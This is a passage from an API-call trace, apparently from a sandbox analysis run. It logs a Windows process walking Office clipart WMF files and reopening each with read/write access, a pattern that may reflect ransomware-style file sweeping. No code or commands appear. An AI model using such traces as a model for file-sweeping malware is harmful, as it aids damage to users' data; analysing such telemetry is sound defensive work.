Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 69 [0101.562] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1204)) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0101.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.562] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04196_.WMF", cAlternateFileName="")) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0101.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0101.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0101.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0101.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0101.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.563] AreFileApisANSI () returned 1 [0101.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0101.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.563] AreFileApisANSI () returned 1 [0101.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0101.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 69 [0101.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.564] GetFileType (hFile=0x33c) returned 0x1 [0101.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.565] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.565] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.565] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.565] CloseHandle (hObject=0x33c) returned 1 [0101.565] AreFileApisANSI () returned 1 [0101.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 69 [0101.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.566] GetFileType (hFile=0x33c) returned 0x1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.566] CloseHandle (hObject=0x33c) returned 1 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.567] AreFileApisANSI () returned 1 [0101.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 69 [0101.567] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc48)) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0101.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.567] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1df4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04206_.WMF", cAlternateFileName="")) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0101.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.568] AreFileApisANSI () returned 1 [0101.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0101.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.569] AreFileApisANSI () returned 1 [0101.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0101.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 69 [0101.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.569] GetFileType (hFile=0x33c) returned 0x1 [0101.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0101.569] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.569] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.570] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.570] CloseHandle (hObject=0x33c) returned 1 [0101.570] AreFileApisANSI () returned 1 [0101.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0101.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 69 [0101.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.570] GetFileType (hFile=0x33c) returned 0x1 [0101.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0101.570] CloseHandle (hObject=0x33c) returned 1 [0101.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 